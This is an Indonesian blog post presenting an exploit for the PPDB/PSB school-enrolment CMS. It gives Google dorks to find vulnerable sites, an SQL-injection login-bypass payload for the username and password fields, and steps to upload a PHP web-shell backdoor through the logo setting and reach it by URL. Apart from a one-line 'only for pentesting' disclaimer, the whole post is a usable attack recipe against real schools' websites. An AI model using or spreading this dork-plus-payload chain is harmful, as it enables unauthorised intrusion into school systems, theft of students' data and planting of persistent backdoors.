ppdb/psb cms vuln bypas Sql Login
PPDB / PSB Indonesian CMS - Bypass Sql Login
Assalamualikum Wr Wb
___________________________________
Bypas Sql Login Aplikasi Website Ppdb/Psb
Di aplikasi Ppdb(penerimaan Peserta didik Baru) Dan Psb(Penemrimaan Siswa Baru) Ada Bug Bypas Sql Login:v
dimana Jika Kalian Memasukan Kode Sql Maka Akan Login
=================================
Google dork: inurl:/umum/ ext:php PPDB
inurl:/umum/login.php
==================================
Proff Of Concept:
1.Search Di Google Menggunakan Dork di atas
2.Masukan Kode Bypas Sql Login
username & Password : ' or 1=1 limit 1 -- -+
3.Lalu Login dan kalian akan masuk Sebagai Anggota Ppdb/Psb
Upload Shell Backdor mu di bagian Setting/pengaturan>>Logo
(note:Ga semua Web Ada)
4.Panggil Shellmu dengan path
www.target.com/[path]/images/logo/nama-shellmu.php
Sekian Semoga Bermanfaat:v
Ini hanya untuk kegiatan Pentesting:v
Wassalmualikum wr wb
Belum ada Komentar untuk "ppdb/psb cms vuln bypas Sql Login"
Posting Komentar